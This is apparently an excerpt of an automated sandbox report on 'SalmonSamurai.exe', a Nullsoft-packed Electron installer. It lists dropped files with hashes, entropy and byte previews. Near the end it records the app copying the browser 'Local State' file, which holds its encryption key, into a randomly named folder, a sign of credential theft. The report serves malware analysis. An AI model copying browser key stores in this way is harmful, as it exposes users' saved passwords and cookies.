                                                                                                                                                                                                                                              Preview:........}...h.\...i.m...j.w...k.....l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}.......".....'...../.....7.....?.....F.....M.....T.....U.....V.....X...........................................................L.....f.....h.....l.....................................................:.....O.....[.....~............................................... .....$.....,.....9.....N.....P.....S.....Z.....q.....................................................!.....(...../.....D.....X.....{.........................................3.....V.....e.....q.....|.............................................................................).....2.....9.....D.....L.....[.................!.....'.....o.................................................................9.....X.........................................!.....0.....G.....M... .X...".m...%.....(.....*.....+.....,.........../.....0.%...1.Z...3.g...4.}...5.....6.....7.....8.....9.2...;.B...<.M...=.Z...>.m...?.v...@.....A.....C...

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\uk.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):705061
                                                                                                                                                                                                                                              Entropy (8bit):4.868598768447113
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:EE70E9F3557B9C8C67BFB8DFCB51384D
                                                                                                                                                                                                                                              SHA1:FC4DFC35CDE1A00F97EEFE5E0A2B9B9C0149751E
                                                                                                                                                                                                                                              SHA-256:54324671A161F6D67C790BFD29349DB2E2D21F5012DC97E891F8F5268BDF7E22
                                                                                                                                                                                                                                              SHA-512:F4E1DA71CB0485851E8EBCD5D5CF971961737AD238353453DB938B4A82A68A6BBAF3DE7553F0FF1F915A0E6640A3E54F5368D9154B0A4AD38E439F5808C05B9F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:............h.....i.....j.....k.....l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.,...|.2...}.D.....L.....Q.....Y.....a.....i.....p.....w.....~...................................!.....K.....d.....m.............................P.....R.....V.....~...................................%.....F.........................................1.....S.....y.............................!.....8.....Q.....[.....k.....{.............................A.....n.........................................(.....H.....l.....x.......................&.....=.........................................A.....D.....i.............................'...........1.....2.....B.....T.....f.....y.............................+.................$.....~...................................$.....R.......................<.....w.............................E.....u......... .....".....%.....(.....*.{...+.~...,.........../.....0. ...1.....3.....4.....5.....6.Z...7.}...8.....9.....;.....<.....=.....>.I...?.X...@.y...A.....C.1...D.J.

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\ur.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):617109
                                                                                                                                                                                                                                              Entropy (8bit):5.143761316646653
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:FF0A23974AEF88AFC86ECC806DBF1D60
                                                                                                                                                                                                                                              SHA1:E7BAE97CBB8692A0D106644DFAA9B7D7EA6FCEF0
                                                                                                                                                                                                                                              SHA-256:F245AB242AAFEEF37DB736C780476534FAD0706AA66DCB8B6B8CD181B4778385
                                                                                                                                                                                                                                              SHA-512:AABE8160FAC7E0EB8E8EB80963FE995FA4A802147D1B8F605BC0FE3F8E2474463C1D313471C11C85EB5578112232FDC8E89B8A6D43DBE38A328538FF30A78D08
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........S...h.....i.....j.....k.+...l.6...n.>...o.C...p.P...r.V...s.g...t.p...v.....w.....y.....z.....|.....}.........................................................................v...............................................!.....c...............................................3.....Z.....g.............................:.....a.....k.....~.......................+.....\.....f.....y.........................................(.....J.....x.......................7.....F.....N.....U.....i...................................P.....c.....}.................(.....X.....g...............................................!.....?.....].....~.....................................................W.................C.............................!.....=.....C.....Q.....e.....k.......................^.......................+.....7.....L.....e............... .....".....%.....(.....*.K...+.N...,.l........./.....0.....1.....3.1...4.^...5.....6.....7.....8.S...9.l...;.....<.....=.....>.....?.....@.....A.....C.W.

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\vi.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):488196
                                                                                                                                                                                                                                              Entropy (8bit):5.7988900625034185
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:3FE6F90F1F990AED508DEDA3810CE8C2
                                                                                                                                                                                                                                              SHA1:3B86F00666D55E984B4ACA1A5E8319FFA8F411FF
                                                                                                                                                                                                                                              SHA-256:5EEBB23221AEBCF0BE01BFC2695F7DD35B17F6769BE1E28E5610D35C9717854B
                                                                                                                                                                                                                                              SHA-512:9AA9D55F112C8B32AA636086CFD2161D97EA313CAC1A44101014128124A03504C992AC8EFD265ABA4E91787AEF7134A14507A600F5EC96FF82DF950A8883828C
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:............h.j...i.....j.....k.....l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.!...}.3.....;.....@.....H.....P.....X....._.....f.....m.....n.....o.....q...............................................(.....2.....Y.....x.....z.....~................................... .....+.....D.....t...........................................................5.....L.....V.....a.....r...........................................................T.....q.................................................................o...................................<.....P.....[.....i.....|.........................................#.....:.....A.....D.....E.....N.....W.....c.....m.......................4.....C.....................................................2.....=....._.............................4.....i....................................... .....".....%.....(.E...*.j...+.m...,.........../.....0.....1.....3.....4.*...5.?...6.y...7.....8.....9.....;.....<.....=.....>.....?.'...@.I...A.u...C...

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\zh-CN.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):354097
                                                                                                                                                                                                                                              Entropy (8bit):6.680890808929274
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:20F315D38E3B2EDC5832931E7770B62A
                                                                                                                                                                                                                                              SHA1:2390BD585DEC1E884873454BB98B6F1467DCF7BB
                                                                                                                                                                                                                                              SHA-256:53A803724BBF2E7F40AAB860325C348F786EECA1EA5CA39A76B4C4A616E3233F
                                                                                                                                                                                                                                              SHA-512:C338E241DE3561707C7C275B7D6E0FB16185A8CD7112057C08B74FFCE122148EF693FE310C839FF93F102726A78E61DE3E68C8E324F445A07A98EE9C4FDD4E13
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:..........?.h.....i.....j.....k.&...l.-...m.5...o.;...p.@...r.F...s.W...t.`...v.u...w.....|.....}...............................................................................%.....1.....C.....I.....\.....s.....y.....................................................#...../.....G.....S....._.................................................................+.....:.....@.....I.....[.....m.....s.....y...............................................$.....0.....6.....>.....E.....Q.....].....i............................................... .....D.....b.....q.....w............................................................................. .....5.....>.....G.....M.....W.....a.............................K.....].....o.................................................................,.....>.....g............................................. .....".....%.....(.)...*.>...+.A...,.n........./.....0.....1.....3.....4.....5.....6.N...7.c...8.x...9.....;.....<.....=.....>.....?.....@.....A.P...C.w...D...

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\locales\zh-TW.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):350032
                                                                                                                                                                                                                                              Entropy (8bit):6.69437398216595
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:524711882CBFB5B95A63EF48F884CFF0
                                                                                                                                                                                                                                              SHA1:1078037687CFC5D038EEB8B63D295239E0EDC47A
                                                                                                                                                                                                                                              SHA-256:9E16499CD96A155D410C8DF4C812C52FF2A750F8C4DB87FD891C1E58C1428C78
                                                                                                                                                                                                                                              SHA-512:16D45A81F7F4606EDA9D12A8B1DA06E3C866B11BDC0C92A4022BFB8D02B885D8F028457CF23E3F7589DFD191ED7F7FBC68C81B6E1411834EDFCBC9CC85E0DC4D
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:..........\.h.....i.....j.....k.....l.....n.....o.....p.....r.....s.-...t.6...v.K...w.X...y.^...z.m...|.s...}..................................................................................... .....8.....N.....Z.....m...........................................................!.....*.....6.....S.....`.....l.....~.......................................................................#.....)...../.....5.....M.....\.....k.....}.............................................................................'.....T.....`.....l.....................................................,...../.....;.....M....._.....s.............................................................................I.....v.....|...............................................!.....'.....-.....?.....i.....................................................$.....8.....A... .M..."._...%.z...(.....*.....+.....,.........../.....0.....1.@...3.Q...4.i...5.....6.....7.....8.....9.....;.....<.....=.-...>.F...?.P...@.e...A.....C.....D...

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\resources.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):5245458
                                                                                                                                                                                                                                              Entropy (8bit):7.995476669559971
                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:7D5065ECBA284ED704040FCA1C821922
                                                                                                                                                                                                                                              SHA1:095FCC890154A52AD1998B4B1E318F99B3E5D6B8
                                                                                                                                                                                                                                              SHA-256:A10C3D236246E001CB9D434A65FC3E8AA7ACDDDDD9608008DB5C5C73DEE0BA1F
                                                                                                                                                                                                                                              SHA-512:521B2266E3257ADAA775014F77B0D512FF91B087C2572359D68FFE633B57A423227E3D5AF8EE4494538F1D09AA45FFA1FE8E979814178512C37F7088DDD7995D
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:............f.......P'....$*.....-...43@...4.H...4XK...4i]...4.f...4.m...4?p...4.v...4.x...4.z...4.~...4....4.....4?....4.....4....4.....4=....4z....4a....4....4....4.....4.....4.....43....4.....4.....4J....4J....4.....4.....4#....4j....4J....5.....5....v5.:..w5.;..x5.<..y5.>..z5a?...5.?...5.D...5.E...5dJ...5.O...5.V...5.f...5.w...5.x...5.|..n<&...x<....y<....z<....{<....|<....<+....<r....<8....</....<....V@....W@....X@x...Y@d...Z@....[@2...\@O...]@....^@...._@hh..`@....<A....=A.....P.~...Pe....PX....P.....P.....Pt....P.....P3....Q.....QF....Q.....Q.....Q.....Q[....QA....Q.....Q.....QW....Q.....Qv....Q9!...Q.'...QF....Q.1..,Q.F..-QsL...QLN../Q.P..0Q.U..1Q.i..2Q.j..3Q.k..4QEm..5Q.o..6Q.r..7Q~t..8QEw..9Q!x..:Q.z..;Ql...<Q)...=Q....>Q ...?Q"....R....Ry....}.....}. ...}._...}%a...}[h...}.h...}[j...}Lo...}....}.&...}.....}.6...}4;...}.=...}&B...}mG...~.O...~.d...~.q...~.t...~.|...~.}..!~...."~....#~...$~|...&~....'~A...(~....)~....*~t$..+~.4..,~.6..-~V8...~.;../~i<..0~|=..1~iA..2~.H

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\resources\app.asar

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):8623182
                                                                                                                                                                                                                                              Entropy (8bit):5.556347118206602
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:2DB47AF7467164D1BB58AF47DC46F6CD
                                                                                                                                                                                                                                              SHA1:AA4B3F342F7DFBC01ABE53D777508C486F589446
                                                                                                                                                                                                                                              SHA-256:5FC547A0A658287F101970D3882CE47F8D35735AE0E227B507503A3D9764F358
                                                                                                                                                                                                                                              SHA-512:05B8DB2BC8C1BC6EB17A3B8EAFCA9F3F0E2DB21B79BADF520C2208D60071B081EDA96BA0285C6770E1E51E67A1E116773617B8115901E0B99BACBC9B2D96516D
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:....L+..H+..C+..{"files":{"node_modules":{"files":{"@isaacs":{"files":{"cliui":{"files":{"LICENSE.txt":{"size":731,"integrity":{"algorithm":"SHA256","hash":"2dc0465729366c3a7890dfa9e972a1ba7048a26c02116fb8b419a6a1ac110149","blockSize":4194304,"blocks":["2dc0465729366c3a7890dfa9e972a1ba7048a26c02116fb8b419a6a1ac110149"]},"offset":"0"},"build":{"files":{"index.cjs":{"size":10398,"integrity":{"algorithm":"SHA256","hash":"820aa357a7f6a022bfc3ac6ac19d1681921d0421cae898d5096423c0fb3b8607","blockSize":4194304,"blocks":["820aa357a7f6a022bfc3ac6ac19d1681921d0421cae898d5096423c0fb3b8607"]},"offset":"731"},"index.d.cts":{"size":1050,"integrity":{"algorithm":"SHA256","hash":"385fceba2f49ee3f91cd436d3f84b389375e1e8f86906b23f47df2e1b9c2b17b","blockSize":4194304,"blocks":["385fceba2f49ee3f91cd436d3f84b389375e1e8f86906b23f47df2e1b9c2b17b"]},"offset":"11129"},"lib":{"files":{"index.js":{"size":10100,"integrity":{"algorithm":"SHA256","hash":"e67b3446f47d4a672339c99bea9e987979da9fc70f421701814cb9d52ba176

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\resources\elevate.exe

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):107520
                                                                                                                                                                                                                                              Entropy (8bit):6.442687067441468
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:792B92C8AD13C46F27C7CED0810694DF
                                                                                                                                                                                                                                              SHA1:D8D449B92DE20A57DF722DF46435BA4553ECC802
                                                                                                                                                                                                                                              SHA-256:9B1FBF0C11C520AE714AF8AA9AF12CFD48503EEDECD7398D8992EE94D1B4DC37
                                                                                                                                                                                                                                              SHA-512:6C247254DC18ED81213A978CCE2E321D6692848C64307097D2C43432A42F4F4F6D3CF22FB92610DFA8B7B16A5F1D94E9017CF64F88F2D08E79C0FE71A9121E40
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..O..............h.......j.q.....k.....e......e......e.......zR........._...h......h.f.............h......Rich....................PE..L......W............................l........0....@.......................................@....................................P.......x.......................T.......p...............................@............0..$............................text............................... ..`.rdata...k...0...l..................@..@.data...............................@....gfids..............................@..@.rsrc...x...........................@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\snapshot_blob.bin

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):273328
                                                                                                                                                                                                                                              Entropy (8bit):3.2521181832662194
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:8915DD2A6D6B4EBF9A16C77FE063D8DE
                                                                                                                                                                                                                                              SHA1:A03132ADCB99A82BA269D56AB6577CCFD1BB08E5
                                                                                                                                                                                                                                              SHA-256:C1802B29B13663A8890031411270866834246931F71F41397682DD88FA16D485
                                                                                                                                                                                                                                              SHA-512:ABD93CDD634AD4D38B7E3714B183335CDDB9E3AD14660247CC7285066C95342AC8595D68CD0868B8512E73BB656AB54386045533F998576B2CD6501BF456CD2C
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:............11.2.214.9-electron.0............................................;...b...........:..a........a........a........ar.......a........a..............Y.D............`$.........D............`$.......D............`$.......m.D............`$.........D............`D.........D............`$.......1.D............`$.......D............`$.......D............`$.........D............`$.......D............`$......ID............`$.......D............`$.......D............`$....(Jb....I.....@..F^......`.....(Jb....M.....@..F^..`.....H...IDa........D`....D`....D`.......D`.....D]D....D`......WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa............L.............................................................................................................................................................

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\v8_context_snapshot.bin

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):588152
                                                                                                                                                                                                                                              Entropy (8bit):4.83735352889622
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:4CD37EA771EA4FE2F3AD46217CC02206
                                                                                                                                                                                                                                              SHA1:31680E26869B007E62550E96DBF846B3980D5B2B
                                                                                                                                                                                                                                              SHA-256:95F7B8664306DA8D0073A795E86590ED6FDAEDE5F489132E56C8779F53CF1ED5
                                                                                                                                                                                                                                              SHA-512:E1369734CBE17AAF6DD3CEEFB57F056C5A9346D2887A7D3EE7ED177386D7F5E624407869D53902B56AB350E4DED5612C3B0F52C2DD3EFA307E9947701068A2A0
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:.........c~.11.2.214.9-electron.0...........................................H...P<..........X...........a........a........aT.......ar.......a........a..............Y.D............`$.........D............`$.......D............`$.......m.D............`$.........D............`D.........D............`$.......1.D............`$.......D............`$.......D............`$.........D............`$.......D............`$......ID............`$.......D............`$.......D............`$....(Jb....I.....@..F^......`.....(Jb....M.....@..F^..`.....H...IDa........D`....D`....D`.......D`.....D]D....D`......WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa............L.....................................................................................................................................................

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\vk_swiftshader.dll

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):5334528
                                                                                                                                                                                                                                              Entropy (8bit):6.335261874351837
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:524B0D85D992F86A7F26C162F3DBB91C
                                                                                                                                                                                                                                              SHA1:BC9C862FD01F6134A0514DCB63F9FAB7A61CE269
                                                                                                                                                                                                                                              SHA-256:5B2FFB78FA963F2DEA5A7FCF7676FC3ABA243C4372D7528C8F1FC8F726D0A3FA
                                                                                                                                                                                                                                              SHA-512:422A18AF294D7551224E05F5F4F5DCFA51B3455C2E61FC285FD2B95B50274EB77FF317647E17B0E7D47459B4FED19C7C88C90E0878F2269A78D598B1196401D8
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........." ......A..........;.......................................R...........`A..........................................L.~...&.L.P....`R.......P.<_...........pR.X}...L.......................L.(...@.A.@.............L.P............................text.....A.......A................. ..`.rdata...(....A..*....A.............@..@.data...p.....M.......M.............@....pdata..<_....P..`...LO.............@..@.00cfg..8.....Q.......P.............@..@.gxfg....,....R.......P.............@..@.retplne.....0R.......P..................tls....Q....@R.......P.............@..._RDATA..\....PR.......P.............@..@.rsrc........`R.......P.............@..@.reloc..X}...pR..~....P.............@..B................................................................................................................................................................................

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\vk_swiftshader_icd.json

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):106
                                                                                                                                                                                                                                              Entropy (8bit):4.724752649036734
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:8642DD3A87E2DE6E991FAE08458E302B
                                                                                                                                                                                                                                              SHA1:9C06735C31CEC00600FD763A92F8112D085BD12A
                                                                                                                                                                                                                                              SHA-256:32D83FF113FEF532A9F97E0D2831F8656628AB1C99E9060F0332B1532839AFD9
                                                                                                                                                                                                                                              SHA-512:F5D37D1B45B006161E4CEFEEBBA1E33AF879A3A51D16EE3FF8C3968C0C36BBAFAE379BF9124C13310B77774C9CBB4FA53114E83F5B48B5314132736E5BB4496F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"file_format_version": "1.0.0", "ICD": {"library_path": ".\\vk_swiftshader.dll", "api_version": "1.0.5"}}

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\vulkan-1.dll

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):928256
                                                                                                                                                                                                                                              Entropy (8bit):6.558092096809165
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:6D4ADF9A48DBCE2E480EF10B1338CA3C
                                                                                                                                                                                                                                              SHA1:CEB77D5768C6EDA84EC8E0B43821B8027764DE81
                                                                                                                                                                                                                                              SHA-256:4CCA7E6C05B2D988926E4B4D0C8FF91D6356F18DE8BF40B440251180E5CAD6A7
                                                                                                                                                                                                                                              SHA-512:106DB7309B40AFABB1CCA911B204C83129683DC116AEC198568C4228C581BF0DE5963BFFC0B50DF8F43EC355264F271FC383F4155BE45350C0D7DD429C7F7F09
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........." ......................................................................`A........................................H...<!......P...............<o..............T...t.......................X...(...@...@............................................text............................... ..`.rdata..............................@..@.data....L...p... ...V..............@....pdata..<o.......p...v..............@..@.00cfg..8....0......................@..@.gxfg...P(...@...*..................@..@.retplne.....p...........................tls................................@..._RDATA..\...........................@..@.rsrc...............................@..@.reloc..T...........................@..B................................................................................................................................................................................

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj\615a46b9-b254-4013-b097-94c1a9d01919.tmp

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):389
                                                                                                                                                                                                                                              Entropy (8bit):5.6318132694527545
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:6A619119F13B7766B9ED68F9AA7878EB
                                                                                                                                                                                                                                              SHA1:2DE66EB96438BAAF1EF8D635DD9404D8FFFC0373
                                                                                                                                                                                                                                              SHA-256:BC170FF59B3712830DCFBD62033A20E764CE858AF84FA07E32E69ABC822C6511
                                                                                                                                                                                                                                              SHA-512:52BF9CEB90B0EB3ED7AD4DACC56C1947999A3159376B754B1CFFED4ACE8287F341DE1A2519F92A0BC05C132498B8EBBA93A390176F40FE401D889F060D65A348
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABk6En8A6d4SqadlGxeRsyOAAAAAAIAAAAAABBmAAAAAQAAIAAAACEy0gO9+YbExzwNhIQqwDHwlKYBbMRi6/ZL2H3Y0U1QAAAAAA6AAAAAAgAAIAAAAC3qn9HZ/UbF3OXv4bzOb3U/MlLT1c86HVEAkBLCohZhMAAAAHMo+96cyS8Pmen/ZeM8Hy9oyyTjjxpyuvKjP+G98MTlfw0gzc2VYGP+jnxSkoTYM0AAAADgL12wdsnB1ku7Yyr5iu29Gs/zmJDQ80jh2ggmmOznak7JI/WkCPZ/DJ6EaeVqFYnz6FflVUeVtrLB6VarpA9K"}}

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj\Local State (copy)

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):389
                                                                                                                                                                                                                                              Entropy (8bit):5.6318132694527545
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                              MD5:6A619119F13B7766B9ED68F9AA7878EB
                                                                                                                                                                                                                                              SHA1:2DE66EB96438BAAF1EF8D635DD9404D8FFFC0373
                                                                                                                                                                                                                                              SHA-256:BC170FF59B3712830DCFBD62033A20E764CE858AF84FA07E32E69ABC822C6511
                                                                                                                                                                                                                                              SHA-512:52BF9CEB90B0EB3ED7AD4DACC56C1947999A3159376B754B1CFFED4ACE8287F341DE1A2519F92A0BC05C132498B8EBBA93A390176F40FE401D889F060D65A348
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABk6En8A6d4SqadlGxeRsyOAAAAAAIAAAAAABBmAAAAAQAAIAAAACEy0gO9+YbExzwNhIQqwDHwlKYBbMRi6/ZL2H3Y0U1QAAAAAA6AAAAAAgAAIAAAAC3qn9HZ/UbF3OXv4bzOb3U/MlLT1c86HVEAkBLCohZhMAAAAHMo+96cyS8Pmen/ZeM8Hy9oyyTjjxpyuvKjP+G98MTlfw0gzc2VYGP+jnxSkoTYM0AAAADgL12wdsnB1ku7Yyr5iu29Gs/zmJDQ80jh2ggmmOznak7JI/WkCPZ/DJ6EaeVqFYnz6FflVUeVtrLB6VarpA9K"}}

                                                                                                                                                                                                                                              Static File Info

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                              Entropy (8bit):7.999986641840123
                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                              File name:SalmonSamurai.exe
                                                                                                                                                                                                                                              File size:74'023'200 bytes
                                                                                                                                                                                                                                              MD5:4ce4a1f912d0b9840a7f568454c6c45a
                                                                                                                                                                                                                                              SHA1:bbf41f3dee85e038f1cb4965269bb0f06b3bb27a
                                                                                                                                                                                                                                              SHA256:83679dfd6331a0a0d829c0f3aed5112b69a7024ff1ceebf7179ba5c2b4d21fc5
                                                                                                                                                                                                                                              SHA512:1583c31d11bf6d89e801398094222b6600cb610cffaed714e95415e887d31091dff0a386cec67ec0b23d519f5a662d899eb51533aff7327fbe7284573a904d2a
                                                                                                                                                                                                                                              SSDEEP:1572864:FQUvSCC8EhkQ2eCwxbjOcs1ecd3vXqL/PI2FS/oah2O:F54FhAsO11ec5yL/N0oah2O
                                                                                                                                                                                                                                              TLSH:8FF73366AFBD64C1F87330F5054A3993FB1A1B574B09EA3588F8BD9B049899C4F81E13
                                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................h...".....

                                                                                                                                                                                                                                              File Icon

                                                                                                                                                                                                                                              Icon Hash:adaeb397f36b6331

                                                                                                                                                                                                                                              Static PE Info

